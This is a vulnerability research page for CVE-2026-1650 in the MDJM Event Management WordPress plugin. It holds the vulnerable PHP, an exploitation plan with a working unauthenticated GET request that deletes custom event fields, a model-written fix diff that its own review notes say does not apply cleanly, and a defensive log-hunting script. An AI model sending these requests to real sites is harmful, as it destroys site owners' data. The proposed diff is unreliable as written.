# CVE-2026-1650: MDJM Event Management <= 1.7.8.1 - Missing Authorization to Unauthenticated Arbitrary Custom Event Field Deletion

- Plugin: mobile-dj-manager (WordPress plugin)
- Affected versions: <= 1.7.8.1
- Patched in: 1.7.8.2
- Severity: medium, CVSS 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
- Vulnerability type: Missing Authorization
- Published: 2026-03-06 11:57:27; updated: 2026-03-07 01:21:23; days to patch: 1
- Reference: https://www.wordfence.com/threat-intel/vulnerabilities/id/cb309336-5b35-45cf-9c58-4bb75d8a5cba?source=api-prod
- Files changed between the vulnerable and fixed tags: assets/js/jquery.flot.js, assets/js/jquery.flot.pie.js, assets/js/jquery.flot.stack.js, includes/admin/pages/event-fields.php, includes/class-mdjm-stats.php, mobile-dj-manager.php, readme.txt
- Vulnerable source (1.7.8.1): https://plugins.trac.wordpress.org/browser/mobile-dj-manager/tags/1.7.8.1 (zip: https://downloads.wordpress.org/plugin/mobile-dj-manager.1.7.8.1.zip)
- Fixed source (1.7.8.2): https://plugins.trac.wordpress.org/browser/mobile-dj-manager/tags/1.7.8.2 (zip: https://downloads.wordpress.org/plugin/mobile-dj-manager.1.7.8.2.zip)
- All tags: https://plugins.trac.wordpress.org/browser/mobile-dj-manager/tags
- Research status: researched (3 rounds, model gemini-3-flash-preview, 2026-04-18 05:34:02 to 05:34:24); not independently verified; no PoC run recorded

## Description

The MDJM Event Management plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'custom_fields_controller' function in all versions up to, and including, 1.7.8.1. This makes it possible for unauthenticated attackers to delete arbitrary custom event fields via the 'delete_custom_field' and 'id' parameters.

## Research summary

The MDJM Event Management plugin for WordPress is vulnerable to unauthenticated arbitrary custom event field deletion because the `custom_fields_controller` function performs neither a capability check nor nonce verification. An attacker can delete the posts that back custom event fields (custom post type `mdjm-custom-fields`) with a single GET request to an admin entry point that fires `admin_init` without authentication, such as `admin-post.php` or `admin-ajax.php`.

## Vulnerable code

```php
// includes/admin/pages/event-fields.php line 17
function __construct()
{
    add_action('admin_init', array(&$this, 'custom_fields_controller'));

    add_action('mdjm_add_content_tags', array(&$this, 'add_tags'));
    // ...
}
```

```php
// includes/admin/pages/event-fields.php line 104
function custom_fields_controller()
{
    if (isset($_POST['submit_custom_field'])) {
        if ($_POST['submit_custom_field'] == __('Add Field', 'mobile-dj-manager')) {
            $this->add_field();

        } elseif ($_POST['submit_custom_field'] == __('Save Changes', 'mobile-dj-manager')) {
            $this->update_field();
        }
    }

    if (isset($_GET['delete_custom_field'], $_GET['id'])) {
        $this->delete_field();
    }

    return;
} // custom_fields_controller
```

# Exploitation Research Plan: CVE-2026-1650

## 1. Vulnerability Summary
The **MDJM Event Management** plugin (versions up to 1.7.8.1) is vulnerable to unauthenticated arbitrary custom event field deletion. The vulnerability exists in the `MDJM_Event_Fields` class located in `includes/admin/pages/event-fields.php`. The class registers a controller function, `custom_fields_controller()`, on the `admin_init` hook. Because `admin_init` fires on `admin-ajax.php` and `admin-post.php` even for unauthenticated users, and the controller performs neither a capability check (`current_user_can`) nor nonce verification (`check_admin_referer`), an attacker can reach the `delete_field()` method by supplying two GET parameters.

## 2. Attack Vector Analysis
- **Endpoint**: `/wp-admin/admin-ajax.php` (fires `admin_init` for unauthenticated requests, but only when some `action` parameter is present) or `/wp-admin/admin-post.php` (fires `admin_init` unconditionally)
- **Method**: `GET`
- **Vulnerable Hook**: `admin_init`
- **Vulnerable Function**: `MDJM_Event_Fields::custom_fields_controller`
- **Required Parameters**:
    - `delete_custom_field`: must be present in `$_GET` (any value).
    - `id`: the post ID of the custom field to delete.
- **Authentication**: None (unauthenticated).
- **Preconditions**: The attacker must know or guess the ID of an existing custom event field (a post of the custom post type `mdjm-custom-fields`). Post IDs are sequential integers, so iterating over a range is practical.

## 3. Code Flow
1. **Entry Point**: A request is made to `/wp-admin/admin-ajax.php` (or `/wp-admin/admin-post.php`).
2. **Hook Trigger**: WordPress initializes the admin environment and fires the `admin_init` hook without requiring a logged-in user.
3. **Registration**: In `includes/admin/pages/event-fields.php`, the constructor of `MDJM_Event_Fields` registers the handler:
   ```php
   add_action('admin_init', array(&$this, 'custom_fields_controller'));
   ```
4. **Logic Branch**: The `custom_fields_controller()` function executes:
   ```php
   function custom_fields_controller() {
       // ... (POST logic for add/update)
       if (isset($_GET['delete_custom_field'], $_GET['id'])) {
           $this->delete_field();
       }
       return;
   }
   ```
5. **Sink**: The `delete_field()` method is called. Its body is not reproduced here; the advisory confirms that it deletes the post identified by `id` without any further authorization check.

## 4. Nonce Acquisition Strategy
**No nonce is required.**
The code path in `custom_fields_controller()` for the `GET` parameters `delete_custom_field` and `id` does not invoke `check_admin_referer()` or `wp_verify_nonce()`. The missing authorization is the core of this vulnerability.

## 5. Exploitation Strategy
The exploit is a single unauthenticated GET request to an admin entry point that fires `admin_init`.

### Step-by-Step Plan:
1. **Identify Target ID**: Determine the ID of an existing custom event field (post type `mdjm-custom-fields`).
2. **Execute Deletion**: Send the GET request below with curl or any HTTP client, without cookies.
3. **Verify**: Use WP-CLI to confirm the post is gone.

### Malicious Request:
- **URL**: `http://localhost:8080/wp-admin/admin-ajax.php?action=x&delete_custom_field=1&id=[TARGET_ID]`
- **Method**: `GET`
- **Headers**: None required.

The `action` value is arbitrary but must be present: `admin-ajax.php` answers a request that lacks `action` with HTTP 400 (body `0`) before `admin_init` runs, so without it the controller never executes. `/wp-admin/admin-post.php?delete_custom_field=1&id=[TARGET_ID]` needs no `action` parameter at all.

## 6. Test Data Setup
To test the vulnerability, a custom field must first be created.

1. **Create a Custom Event Field via WP-CLI**:
   ```bash
   wp post create --post_type=mdjm-custom-fields --post_title="Sensitive Field" --post_status=publish --post_content="Description" --porcelain
   ```
2. **Record the ID**: With `--porcelain` the command prints only the new post ID (e.g., `123`). This is your `[TARGET_ID]`.

## 7. Expected Results
- **Response**: The HTTP status does not indicate success. If `delete_field()` ends with `wp_safe_redirect()` and `exit`, as other methods in the class do, the response is a 302; otherwise `admin-ajax.php` continues past `admin_init`, finds no handler for the dummy `action`, and answers 400 with body `0`, while `admin-post.php` returns an empty 200. In every case the deletion has already happened by the time the response is sent.
- **Data State**: The post with ID `[TARGET_ID]` and post_type `mdjm-custom-fields` should no longer exist. `wp_delete_post()` removes a custom-post-type post permanently (only `post` and `page` are moved to the trash automatically), so the field ends up in the trash only if `delete_field()` explicitly calls `wp_trash_post()`.

## 8. Verification Steps
After sending the HTTP request, verify the deletion using WP-CLI:

```bash
# Look up the post by ID across all statuses; no output means it is gone
wp post list --post_type=mdjm-custom-fields --post_status=any --post__in=[TARGET_ID] --fields=ID,post_status
```
If the command prints no rows, the exploit succeeded. A row with `post_status` `trash` means the field was trashed rather than deleted, which is still an integrity impact.

## 9. Alternative Approaches
If `/wp-admin/admin-ajax.php` is blocked (some hosts firewall or rate-limit it), any other admin file that fires `admin_init` before redirecting unauthenticated users can be targeted:
- `/wp-admin/admin-post.php?delete_custom_field=1&id=[TARGET_ID]` (fires `admin_init` unconditionally and needs no `action` parameter; as reliable as `admin-ajax.php`)
- `/wp-admin/index.php?delete_custom_field=1&id=[TARGET_ID]` (not usable without a session: `index.php` loads `admin.php`, which calls `auth_redirect()` and sends unauthenticated visitors to the login page before `admin_init` fires)

Since the vulnerability is unauthenticated, `admin-ajax.php` and `admin-post.php` are the reliable vectors.

## Exploit outline

1. Identify the post ID of a custom event field (post type `mdjm-custom-fields`).
2. Construct a GET request to an admin entry point that fires `admin_init` without authentication (`/wp-admin/admin-post.php`, or `/wp-admin/admin-ajax.php` with any `action` value) including the parameters `delete_custom_field=1` and `id` set to the target post ID.
3. Send the request without any authentication headers or session cookies.
4. The plugin's `custom_fields_controller` function, hooked to `admin_init`, runs and calls `delete_field()` without checking the requester's identity or capabilities.
5. Observe that the custom event field has been deleted.

## Research fix diff

Proposed fix produced in the research run (model gemini-3-flash-preview), not the upstream 1.7.8.2 commit; compare with the fixed tag linked above before relying on it.

```diff
--- includes/admin/pages/event-fields.php
+++ includes/admin/pages/event-fields.php
@@ -104,6 +104,10 @@
 		function custom_fields_controller()
 		{
+			if ( ! current_user_can( 'manage_options' ) ) {
+				return;
+			}
+
 			if (isset($_POST['submit_custom_field'])) {
 				if ($_POST['submit_custom_field'] == __('Add Field', 'mobile-dj-manager')) {
 					$this->add_field();
@@ -115,6 +119,8 @@
 			}
 
 			if (isset($_GET['delete_custom_field'], $_GET['id'])) {
+				check_admin_referer( 'mdjm_delete_custom_field_' . $_GET['id'] );
+				$this->delete_field();
 			}
 
 			return;
```
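Review bot: the early `return` on a failed `manage_options` check in the first hunk is the right shape for an `admin_init` callback, since a `wp_die()` there would abort every other admin request that loads this class; two things to settle before merging are whether `manage_options` is the intended gate (if the plugin grants field management to a narrower event-management capability, non-administrator staff who could previously add and edit fields are now silently locked out) and that the `$_POST['submit_custom_field']` add/update branches, which this hunk leaves without `check_admin_referer()`, are still open to CSRF against a logged-in administrator once the capability check passes.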
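Review bot: in the second hunk `$this->delete_field();` is marked as an added line, but the vulnerable snippet shows that call already inside the `if (isset($_GET['delete_custom_field'], $_GET['id']))` block, so the hunk does not apply to the code it claims to fix (the `-115,6` count assumes the call was absent and the patch would fail on context). Make it an unchanged context line (leading space, not `+`), keep only the `check_admin_referer( 'mdjm_delete_custom_field_' . $_GET['id'] );` addition, and correct the header to `@@ -115,7 +119,8 @@`. The nonce action also concatenates raw `$_GET['id']`; use `absint( $_GET['id'] )` so the action string is canonical, and note that the admin page's delete link must now be built with `wp_nonce_url( $url, 'mdjm_delete_custom_field_' . $id )`, which this patch does not touch, or every legitimate deletion from the UI dies at the nonce check.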
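For defenders, the following added example (written for this page; it is not code from the plugin, from Wordfence, or from the research run) hunts web-server access logs for exploitation attempts. It assumes Apache/Nginx combined log format; the sample lines, IP addresses, timestamps and the `mdjm-custom-event-fields` page slug are constructed for the example. A request is rated `high` when it carries both parameters to `admin-post.php` or `admin-ajax.php`, which run `admin_init` for unauthenticated clients, and `review` when the same parameters appear on another wp-admin URL, which only reaches the controller for a logged-in user and may be a legitimate deletion from the plugin's own UI. Front-end URLs with the parameters are ignored because `admin_init` never fires there.

```python
"""Hunt combined-format access logs for CVE-2026-1650 exploitation attempts.

Added example for this advisory page; not plugin, Wordfence or research-run code.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Combined log format: host ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Admin entry points that fire admin_init for unauthenticated requests.
UNAUTH_ADMIN_INIT = ("/wp-admin/admin-post.php", "/wp-admin/admin-ajax.php")


@dataclass
class Hit:
    ip: str
    time: str
    path: str
    field_id: str
    status: int
    severity: str  # "high": reachable unauthenticated; "review": needs a login


def classify(target: str) -> Optional[str]:
    """Rate one request target, or return None if it is not an attempt.

    Both `delete_custom_field` and `id` must be present, and the path must be
    under /wp-admin/ (the controller is hooked to admin_init only).
    """
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "delete_custom_field" not in qs or "id" not in qs:
        return None
    if not parts.path.startswith("/wp-admin/"):
        return None
    return "high" if parts.path in UNAUTH_ADMIN_INIT else "review"


def scan(lines: Iterable[str]) -> List[Hit]:
    """Parse each log line and collect the requests that match the attack shape."""
    hits: List[Hit] = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        severity = classify(m["target"])
        if severity is None:
            continue
        parts = urlsplit(m["target"])
        field_id = parse_qs(parts.query, keep_blank_values=True)["id"][0]
        hits.append(Hit(m["ip"], m["time"], parts.path, field_id, int(m["status"]), severity))
    return hits


# Constructed sample lines: IPs, times and the admin page slug are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Mar/2026:12:01:07 +0000] "GET /wp-admin/admin-post.php?delete_custom_field=1&id=123 HTTP/1.1" 302 0 "-" "curl/8.4.0"',
    '203.0.113.5 - - [06/Mar/2026:12:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=x&delete_custom_field=1&id=124 HTTP/1.1" 400 1 "-" "curl/8.4.0"',
    '198.51.100.9 - - [06/Mar/2026:12:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 52 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [06/Mar/2026:12:03:11 +0000] "GET /wp-admin/admin.php?page=mdjm-custom-event-fields&delete_custom_field=1&id=7&_wpnonce=abc HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [06/Mar/2026:12:04:00 +0000] "GET /?delete_custom_field=1&id=5 HTTP/1.1" 200 8812 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.severity:6} {h.ip:14} {h.time} {h.path} id={h.field_id} status={h.status}")
```

Run against a real log with `scan(open("access.log"))`. Because the response status carries no signal (a 302 or a 400 both follow a completed deletion), the rule keys only on the request shape; correlate `high` hits with `wp post list --post_type=mdjm-custom-fields --post_status=any` on the site to confirm what was removed.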